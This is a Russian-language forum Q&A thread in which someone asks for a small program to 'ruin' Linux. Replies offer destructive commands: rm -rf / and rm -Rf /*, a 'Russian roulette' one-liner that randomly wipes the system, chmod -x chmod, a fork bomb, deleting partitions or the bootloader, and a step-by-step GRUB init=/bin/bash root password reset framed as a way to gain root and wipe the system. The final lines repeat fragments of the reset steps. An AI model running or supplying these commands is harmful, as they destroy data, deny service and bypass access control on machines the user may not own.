Программное обеспечение
Каким образом или прогой можно уничтожить линукс.
Нужна какая нибудь небольшая прога чтобы испортить линукс. Типо как в виндовс "вачная загрузка" или чтото типо этого. ОЧЕНЬ НАДО. Зарание спасибо!
Прикольный вопрос :))
Если знаешь пароль рута, то убить можно командой rm -rf / хотя опять же не все современные дистрибутивы можно так легко завалить. Забавной разновидностью данной команды является "игра" русская рулетка, когда рандомно выпадает эта команда для выполнения, в противном случае выдается сообщение "Жив":
[ $[ $RANDOM % 6 ] == 0 ] && rm -rf / || echo "Жив"
Еще одна прикольная штука - это "шутка" с правами: chmod -x chmod, но для этого тоже требуется знать пароль рута :)
Или вот еще форк-бомба, для нее не требуется знать пароль root, но лечится перезагрузкой системы. Команда в "терминале":
:(){ :|:&};:
Заполняет ресурсы системы бесполезными копиями программы. По причине исчерпания ресурсов система по крайней мере на некоторое время становится недоступна для пользователя.

:(){ :|:&};:
зайди с лайв CD и удали xorg
Если не знаешь пароля админа, грохнуть его не получится. Очень хорошее разграничение прав.
Попробуй удалить все файлы из своей домашней директории, но систему это не испортит.
Еще один способ - удаление разделов.
Его не один вирус не берет. А ты испортить собрался )))
Ха! Linux is invulnerable and immortal!!! Ha-ha-ha!!!
Убей загрузчик, рутовй пароль можно получить очень легко и просто в гугле множество решений, а с рутом можно творить что хочешь. По рутом шлепая бездумно команды линух упадет за кратчайшие сроки. Система дохлая.
Пароль root'а в Линухе получить легко, если есть прямой доступ к компьютеру. Вернее, не получить, а сбросить:
1. в процессе загрузки Grub нажимаем клавишу ' e ' для редактироварания, находим строку типа:
kernel /boot/vmlinuz-x.x.x-x-x root=/dev/xda1 ro
меняем её на
kernel /boot/vmlinuz-x.x.x-x-x root=/dev/xda1 rw init=/bin/bash
нажимаем 'Enter'.
Далее нажимаем клавишу 'b' для загрузки.
Система загрузится в консоль с правами root.
root@(none):/#
root@(none):/# passwd
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
root@(none):/#
Перезагружаемся. Логинимся от root'а. Можем делать с системой всё, что угодно — вплоть до rm -Rf /*
меняем её на
нажимаем 'Enter'.
root@(none):/#
root@(none):/# passwd
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
root@(none):/#